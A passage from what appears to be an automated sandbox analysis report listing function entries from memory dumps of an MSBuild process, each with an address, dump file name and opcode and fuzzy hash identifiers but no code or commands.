                        • Instruction Fuzzy Hash: 25E09276A09710CFD7057B7CA82907EBFA6EF8621574441AEE90AD7602EF7188018786
                        Function 0673AEE0 Relevance: .0, Instructions: 24COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1686208066.0000000006730000.00000040.00000800.00020000.00000000.sdmp, Offset: 06730000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6730000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: d0d1f36803e47db8e5d4fd4352d5ad86db23334bee9d14a6e04265601c859f67
                        • Instruction ID: 327601c20ef6af92a3c2b1969d7f94d13cef8cdb82948ddffae14641909a1e3e
                        • Opcode Fuzzy Hash: d0d1f36803e47db8e5d4fd4352d5ad86db23334bee9d14a6e04265601c859f67
                        • Instruction Fuzzy Hash: E3E0D872046714FFCB031BA4DC11891BF66EB1B33835581EAE2948A1A2C773D463CBD0
                        Function 0673FB88 Relevance: .0, Instructions: 24COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1686208066.0000000006730000.00000040.00000800.00020000.00000000.sdmp, Offset: 06730000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6730000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: f605799af27b2d3b854c0222f27491da5f24075373a5fe3c4c9b78d18c5c3426
                        • Instruction ID: 04422c506f0b1f082f5bb664c711a7ecd45c009769ecafcb7dfbbd8c5a5a92ab
                        • Opcode Fuzzy Hash: f605799af27b2d3b854c0222f27491da5f24075373a5fe3c4c9b78d18c5c3426
                        • Instruction Fuzzy Hash: 89E02633E6027787D77142A8E0243B633CE8B842A0F048073D24DCFB82C59D881147D0
                        Function 0676C790 Relevance: .0, Instructions: 24COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1686405742.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6760000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: c9759c57b48a0a53bc4b7dc0f0352631f0447f3b9798fef1a56295a3fccb9aef
                        • Instruction ID: e10302641410e85419d43732a47a88ef82c47d99385d51eee24f731891f18de8
                        • Opcode Fuzzy Hash: c9759c57b48a0a53bc4b7dc0f0352631f0447f3b9798fef1a56295a3fccb9aef
                        • Instruction Fuzzy Hash: 8FE06D70E002199FCB80EBB898092AE7BF4EB49610F108069D90AD7201EB315A01CFC1
                        Function 067635E0 Relevance: .0, Instructions: 24COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1686405742.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6760000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: fdeac2890668e816012e1f41dc5492f2ca78497c9c089c0c6c77b88ce5c7c276
                        • Instruction ID: a71ece83a37549cdda682ef9db5f8e706ae31c58ba0daf881615dc5540daeb91
                        • Opcode Fuzzy Hash: fdeac2890668e816012e1f41dc5492f2ca78497c9c089c0c6c77b88ce5c7c276
                        • Instruction Fuzzy Hash: EAF01E71C00219CFCB80EFBCD9002EEBBB8EF09210F10812AE919E7210E7309A94CBC1
                        Function 0676E088 Relevance: .0, Instructions: 24COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1686405742.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6760000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: def9af5373aa604ec75d8b28a700a42cc743e48b59f94dabd8742619f2c635c7
                        • Instruction ID: f31ac461cf965c83ef5f4d736f4d3968914cbd03175b6653712089d4203535be
                        • Opcode Fuzzy Hash: def9af5373aa604ec75d8b28a700a42cc743e48b59f94dabd8742619f2c635c7
                        • Instruction Fuzzy Hash: C6E0DF327543041BE314E6A9D000B62F7C9BB44320F14406AE681CB2E0DF22D840C7A4
                        Function 010196C2 Relevance: .0, Instructions: 23COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1680309189.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_1010000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 12bdf477ec3059ebef0a89980f36e45c6d2d4612f632991aca1660fa1568bc17
                        • Instruction ID: 8bbae77d14b03cca0bb9b9345ead6dfd529d3a913e5827dea19e19b2f07234cc
                        • Opcode Fuzzy Hash: 12bdf477ec3059ebef0a89980f36e45c6d2d4612f632991aca1660fa1568bc17
                        • Instruction Fuzzy Hash: 53F0A0302003658FC721EB29E20A31DBFE6DB80209F00092EE146C7724CFB5A845CB51
                        Function 01011858 Relevance: .0, Instructions: 23COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1680309189.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_1010000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: dfd36f1d6b2ce6898efb1af7476b34bcfb26872239ade4a2af060fc74cd388e7
                        • Instruction ID: 2e969cadb5c6cc5fc9ac089a31f3cc1072933f2c727a0f075f5512d279ca91f3
                        • Opcode Fuzzy Hash: dfd36f1d6b2ce6898efb1af7476b34bcfb26872239ade4a2af060fc74cd388e7
                        • Instruction Fuzzy Hash: FDE06D71909288AFCB42CBB4A99149C7F71DF47248B1805DED045D7262EA351E06D710
                        Function 0673F9D8 Relevance: .0, Instructions: 23COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1686208066.0000000006730000.00000040.00000800.00020000.00000000.sdmp, Offset: 06730000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6730000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 5c7e90a18c4493cc0d9be22be28de5dd6d0763f4c62830ba6cb910d69191dd5a
                        • Instruction ID: 59e7e72a292c98ac675b00dc5f23819059e8a22cda73069ce2b144ffe05220d1
                        • Opcode Fuzzy Hash: 5c7e90a18c4493cc0d9be22be28de5dd6d0763f4c62830ba6cb910d69191dd5a
                        • Instruction Fuzzy Hash: DAE0C276D042620FCF42AF14F8126603B64D7B228030441A3D049CA167E91D884BCB61
                        Function 0676DD98 Relevance: .0, Instructions: 23COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1686405742.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6760000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: ec851e158083be63d745288aa95b7915574c63a21f32e94681f04ea4a26c8fef
                        • Instruction ID: caca9f834af2f1c2d45f26a939860e4690a7d1da4a05deeec6b2b291456e6a15
                        • Opcode Fuzzy Hash: ec851e158083be63d745288aa95b7915574c63a21f32e94681f04ea4a26c8fef
                        • Instruction Fuzzy Hash: 8AE01271E042189FCB80EFB994045DEBBF9AF58210B10C166E919E3200E7309E10CBD1
                        Function 0101FCB9 Relevance: .0, Instructions: 22COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1680309189.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_1010000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: fb01eee6b7012ff3ca9224fa2d6e2467a307f644d92a042aa10091ef01942344
                        • Instruction ID: e7b199f806194caba0c38b68ab5de1fd897052099eebb7ef884ac2e6aa2f7948
                        • Opcode Fuzzy Hash: fb01eee6b7012ff3ca9224fa2d6e2467a307f644d92a042aa10091ef01942344
                        • Instruction Fuzzy Hash: DEE0C231B102089FCB109A78E909585BFA8DF0A21174000A2F949DB26AEA30DC08CBA1
                        Function 067638F3 Relevance: .0, Instructions: 22COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1686405742.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6760000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 35b84f94b88a8a6bbd2db9750c0a6f89dae5673acd1ec2e25372093351c816b1
                        • Instruction ID: 98a234d37558a75e660185dd2808aac2819a8e1e0a1d39138b4754d864a681f3
                        • Opcode Fuzzy Hash: 35b84f94b88a8a6bbd2db9750c0a6f89dae5673acd1ec2e25372093351c816b1
                        • Instruction Fuzzy Hash: 20E06D3094470BCFE7419F50C0055ADBBB0EF55310F101A09E802A6250CB765A85CBE1
                        Function 01018738 Relevance: .0, Instructions: 21COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1680309189.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_1010000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 7d87fba70e3977d3c7a677d24c66d0d478271cedf08a6ccf00f50cd4bb21aae8
                        • Instruction ID: 803e64162996e4735d10d89cb5143a44bc4590a2ec38d1cb760ecadf005a3f34
                        • Opcode Fuzzy Hash: 7d87fba70e3977d3c7a677d24c66d0d478271cedf08a6ccf00f50cd4bb21aae8
                        • Instruction Fuzzy Hash: 98E026323101148FCB006B28E5192AE3BE6EFC02127000829F107D7380CE3459068785
                        Function 0101FE90 Relevance: .0, Instructions: 21COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1680309189.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_1010000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: df3190bb28f2c38dda617af77d003e88acdc9f1af9b2d11acf74258e05ae7c1d
                        • Instruction ID: 579c3b63f3e7dd6e5e77db18dbbc3c1881138dc3032a7d3c9ac274f75a9b5b77
                        • Opcode Fuzzy Hash: df3190bb28f2c38dda617af77d003e88acdc9f1af9b2d11acf74258e05ae7c1d
                        • Instruction Fuzzy Hash: 9DD097B3A243810FC301EABCA8201DF3F66CB80220F004ABBD808C3281EF30C90547A9
                        Function 06735368 Relevance: .0, Instructions: 21COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1686208066.0000000006730000.00000040.00000800.00020000.00000000.sdmp, Offset: 06730000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6730000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 77f0e2e5c2af20acd0498c8d8a4bac41533a9514334b889425901d9477bc5d1f
                        • Instruction ID: 388bf8765762b7be9b09129f0183f825a00d0cc08c891ae22799954890b99bca
                        • Opcode Fuzzy Hash: 77f0e2e5c2af20acd0498c8d8a4bac41533a9514334b889425901d9477bc5d1f
                        • Instruction Fuzzy Hash: 51E0C236B00A108BDB083B3CF82807DBBAAEFC52117404129E906E7701EF70D8008785
                        Function 06760D20 Relevance: .0, Instructions: 21COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1686405742.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6760000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b9d1a297fce50ac7c3b17315757c116ea89ac72ab842a32e656dc6f9d800d872
                        • Instruction ID: 48fa217a79b5d91456d824ebb6313744f82a739bdce8a9502a95b57610eeb130
                        • Opcode Fuzzy Hash: b9d1a297fce50ac7c3b17315757c116ea89ac72ab842a32e656dc6f9d800d872
                        • Instruction Fuzzy Hash: E3D012367115104B4604565EE40885EFBDFEFC9A2231540ABF905C7330CEB0DC024AA4
                        Function 0676ADE0 Relevance: .0, Instructions: 21COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1686405742.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6760000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 2c77408693fd5a5704eda5a75b4dfcbb2a94817fd128186261031eea3881b1e5
                        • Instruction ID: 3de7be0fed4ffc7ecff5ced66ac36993e4ee1f76ef60f097892c1957e56ff473
                        • Opcode Fuzzy Hash: 2c77408693fd5a5704eda5a75b4dfcbb2a94817fd128186261031eea3881b1e5
                        • Instruction Fuzzy Hash: A2E012353545208FC614DB2ED449C593BECEF49A6530100A9F50ACB372DF61EC00CBD4
                        Function 066F8720 Relevance: .0, Instructions: 21COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1685976702.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_66f0000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 40e4672c94cae1f4e73458c4809d5e541b96ffecb92d554addb2d252038acdff
                        • Instruction ID: d80e4d1b03752c588602e766aa32d4a7c3dc3885213ed18b3b22f1bb0c967564
                        • Opcode Fuzzy Hash: 40e4672c94cae1f4e73458c4809d5e541b96ffecb92d554addb2d252038acdff
                        • Instruction Fuzzy Hash: 99D05B31419E4D8FD301A774D8205ED7F34EF272017415256E985D7052EA26455BCB61
                        Function 066F94F8 Relevance: .0, Instructions: 21COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1685976702.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_66f0000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: f38626f5cd47e7ae1f1b04a3c30c5593b324ddf561c349d8011a5128bdb339a4
                        • Instruction ID: b5fb1f50d081539e880aa0a0826ea8c30d2769a3eafc0e31f7bba3dbffea824d
                        • Opcode Fuzzy Hash: f38626f5cd47e7ae1f1b04a3c30c5593b324ddf561c349d8011a5128bdb339a4
                        • Instruction Fuzzy Hash: F5E0C272A043459FC741DFE488126B6BF669AA330474047D6C9458B261E9318E04C3A2
                        Function 01018748 Relevance: .0, Instructions: 20COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1680309189.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_1010000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: ece4b0edca025382133f5a43db71723fcb4716982ad82510fec0646f1250622b
                        • Instruction ID: 797276794f34461ab14434100a19a4e76d8e38db3352d9451c3ae8b2901da6d8
                        • Opcode Fuzzy Hash: ece4b0edca025382133f5a43db71723fcb4716982ad82510fec0646f1250622b
                        • Instruction Fuzzy Hash: AFD05E313101289F8B156779F8294AE7FEAEBC5665344042DF207C7380CE655E46C7EA
                        Function 0673AD88 Relevance: .0, Instructions: 20COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1686208066.0000000006730000.00000040.00000800.00020000.00000000.sdmp, Offset: 06730000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6730000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: efce420de809641a2a5443e41696cafa400a34474058c4d3b4981bd7a3658a71
                        • Instruction ID: 2f8e96e577bf01b1e2ef625864f376d917d1f581df982c20b1e31449e3a25267
                        • Opcode Fuzzy Hash: efce420de809641a2a5443e41696cafa400a34474058c4d3b4981bd7a3658a71
                        • Instruction Fuzzy Hash: B4E0C22066E3A81BC7826B7978104A67FEA0F4301536441ABD988C324BDD50D84987A5
                        Function 066F95D0 Relevance: .0, Instructions: 20COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1685976702.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_66f0000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 6555c1792119a4f9593870baf364800ec607d2d5342284516e587dd39ad38038
                        • Instruction ID: c03a89daae7ab41c69b72cdbf4ab8a8d181e64d5c74bcc7fe68289457b7c387a
                        • Opcode Fuzzy Hash: 6555c1792119a4f9593870baf364800ec607d2d5342284516e587dd39ad38038
                        • Instruction Fuzzy Hash: 06E01A70D0020CBFCB44EFA8E8444ADFFB5EF45300F0081A9E809A7350DA341A49CF85
                        Function 067353A8 Relevance: .0, Instructions: 19COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1686208066.0000000006730000.00000040.00000800.00020000.00000000.sdmp, Offset: 06730000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6730000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 2e62ca5a471da7bef2f241b39172160b81faa57e34b3c5435cb3cfd27f378800
                        • Instruction ID: b511217377ba51c37c665932b55d69ee1d63c4ad2d0745d554d2ed65709a35e4
                        • Opcode Fuzzy Hash: 2e62ca5a471da7bef2f241b39172160b81faa57e34b3c5435cb3cfd27f378800
                        • Instruction Fuzzy Hash: F7D09531D017749FEFE11534E0043F97FF1AF05139F00105AD585C1951CEE454408F41
                        Function 06736BFA Relevance: .0, Instructions: 19COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1686208066.0000000006730000.00000040.00000800.00020000.00000000.sdmp, Offset: 06730000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6730000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: fca9a9acab97aed1791515f14d02b094081042f1fd21f472ac44dd4dbcb0fd50
                        • Instruction ID: e8d48c70113a26fc72450d35c3ba29ef23733e91385ddfd9d1ce98c445d2cbe7
                        • Opcode Fuzzy Hash: fca9a9acab97aed1791515f14d02b094081042f1fd21f472ac44dd4dbcb0fd50
                        • Instruction Fuzzy Hash: 00E0E53AA00129DBDF509F84E885BACBB71FB44315F10C0A6F649A6250CF315A99CF90
                        Function 06762550 Relevance: .0, Instructions: 19COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1686405742.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6760000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b0364021e05cd67ad13c7e4a5693de949a20264295eb5897286cc993c5623852
                        • Instruction ID: 09002ccc73cdfb6a9a401b87db9c5adaa4f0bd4f3c2f9c0c08866eaecdbce18a
                        • Opcode Fuzzy Hash: b0364021e05cd67ad13c7e4a5693de949a20264295eb5897286cc993c5623852
                        • Instruction Fuzzy Hash: C0D05E367101209F87089F1EE40486ABBEFEFC962132540ABE109CB322CA71EC03C790
                        Function 06768EC8 Relevance: .0, Instructions: 19COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1686405742.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6760000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: fbe92804638ef94f04538cad5495e791ceca958f08305796f30416b85d80e7a7
                        • Instruction ID: 0bdb7ea32a0dbef23fc9be678302a3a91aa143f96c9727e253a362c64f2b0e2f
                        • Opcode Fuzzy Hash: fbe92804638ef94f04538cad5495e791ceca958f08305796f30416b85d80e7a7
                        • Instruction Fuzzy Hash: BBD02B345082704BC2266A65B4141E63B22DB8B25071B0182F4409B196CB584C4A97F3
                        Function 010197ED Relevance: .0, Instructions: 18COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1680309189.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_1010000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 27205f8d6bd76afb7ac3dfd01a33b14d98427f8dbb88b7828f13ad8d1e0cab16
                        • Instruction ID: 5a84d258e55bcf76aed0fb3ef0010842d2da1a6acdd9072e99fd740d08e06a55
                        • Opcode Fuzzy Hash: 27205f8d6bd76afb7ac3dfd01a33b14d98427f8dbb88b7828f13ad8d1e0cab16
                        • Instruction Fuzzy Hash: D2E086A15082904FE312DB2CC859B867BD0AB51704FD9C0DDE4844A59BDA2DE50BD792
                        Function 067346E9 Relevance: .0, Instructions: 18COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1686208066.0000000006730000.00000040.00000800.00020000.00000000.sdmp, Offset: 06730000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6730000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: edebb5e4569dea029b4b8b10d41c4123addf4fe492cb0b4297a82cac1d85262f
                        • Instruction ID: f0459227652095c9dbcffd734daf4b905ebda13e7da8d6d18ea6ae5d325391dd
                        • Opcode Fuzzy Hash: edebb5e4569dea029b4b8b10d41c4123addf4fe492cb0b4297a82cac1d85262f
                        • Instruction Fuzzy Hash: 8AE08671A192A48FEF46DF68D9516313FF2E793204F0580D6E085CB15BD538A905CA62
                        Function 066F874F Relevance: .0, Instructions: 18COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1685976702.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_66f0000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 4264dcbeab921cfa1fba8b6ca5fe2c15013e112a8254d32104413660f9eb57d1
                        • Instruction ID: 779b52aadc8db142dd021f4a2db9ca6cfaf919e13056f935fb1baec4dccda3ac
                        • Opcode Fuzzy Hash: 4264dcbeab921cfa1fba8b6ca5fe2c15013e112a8254d32104413660f9eb57d1
                        • Instruction Fuzzy Hash: 05D05E3589964C9DCB02BBA4E8248F93F78EB63301F05456EE986D6021FE2185A8DB91
                        Function 066F94C0 Relevance: .0, Instructions: 18COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1685976702.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_66f0000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 81b1eda40c352de85e4aff86a2e72d0c394d0830fd589eb338541675ee218e3f
                        • Instruction ID: eabe0cfa3f65c5e4b1c763a8f33f33259f12461654b7b170cbb627b1b8321255
                        • Opcode Fuzzy Hash: 81b1eda40c352de85e4aff86a2e72d0c394d0830fd589eb338541675ee218e3f
                        • Instruction Fuzzy Hash: 41E09274E05208AFCB44EFA9D44449DBFF5EB88200F0081AAD808E3300EA349A508F80
                        Function 0101B821 Relevance: .0, Instructions: 17COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1680309189.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_1010000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: f5fad723aa5ef00d55eb207def834f032db3a3324057a8c5dfe3e5e39fa007de
                        • Instruction ID: cc68948d60b57df8fa6d272f7f04efeed76243d02e44e1f4e9df9f7c1486abf4
                        • Opcode Fuzzy Hash: f5fad723aa5ef00d55eb207def834f032db3a3324057a8c5dfe3e5e39fa007de
                        • Instruction Fuzzy Hash: 80E08C701407208FC609FB0BF84474477B2E784205F409268E080572A9DB396D8ACF80
                        Function 0101C8D0 Relevance: .0, Instructions: 17COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1680309189.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_1010000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 551fef20bc49d2c9335e534cb7fee2dff511767fadb722aeb3448fbe675511ac
                        • Instruction ID: 6446dfdda41535d721253e944043e6d85887cd6d0ed3a2daedcdd9e02fb31f89
                        • Opcode Fuzzy Hash: 551fef20bc49d2c9335e534cb7fee2dff511767fadb722aeb3448fbe675511ac
                        • Instruction Fuzzy Hash: C1D05E39B512164BE7086A1CA5593A82F9AB7C8121B18812AE805D2254CF6A88014A80
                        Function 0101AF38 Relevance: .0, Instructions: 17COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1680309189.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_1010000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: ea9d3ccc47cdeea21f2fad1dab3ccffd11c5b62f32991d5ed67df0505cb015f0
                        • Instruction ID: 495132c5cc68c3c508087c2735f0085a458c4cb5311cde20168b13f004ca5114
                        • Opcode Fuzzy Hash: ea9d3ccc47cdeea21f2fad1dab3ccffd11c5b62f32991d5ed67df0505cb015f0
                        • Instruction Fuzzy Hash: 32E086301002158BDB04EB26F4417883BF0FB95208B800699E840972A9DB147D85CB45
                        Function 01019ED8 Relevance: .0, Instructions: 17COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1680309189.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_1010000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 808e8f70706d7eebe155e0056c34c1fe542d785a5ffe0cde7a27474a25c15add
                        • Instruction ID: 4b1fb83897a449aa6e7802642d2a323ff1db689467f8d104399092fffef76f97
                        • Opcode Fuzzy Hash: 808e8f70706d7eebe155e0056c34c1fe542d785a5ffe0cde7a27474a25c15add
                        • Instruction Fuzzy Hash: 91E08C395012248FDB08FB66F49168837B5FBB9244B854785E844872A8EB246E8A8B84
                        Function 06731380 Relevance: .0, Instructions: 17COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1686208066.0000000006730000.00000040.00000800.00020000.00000000.sdmp, Offset: 06730000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6730000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b4adc644d5178be9f6bdf4641a6f6856291b5b78bd48adaa45efd3d1a11e7798
                        • Instruction ID: 2038430b455275b7fc55cdeb80776f1363b1d0d99889fe0d3d9d058b836faed3
                        • Opcode Fuzzy Hash: b4adc644d5178be9f6bdf4641a6f6856291b5b78bd48adaa45efd3d1a11e7798
                        • Instruction Fuzzy Hash: 25E01A7590021EDFEB60CFA0C848BEEBBB0BF44300F104166D80AA3681CB705A80CF90
                        Function 067620AB Relevance: .0, Instructions: 17COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1686405742.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6760000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
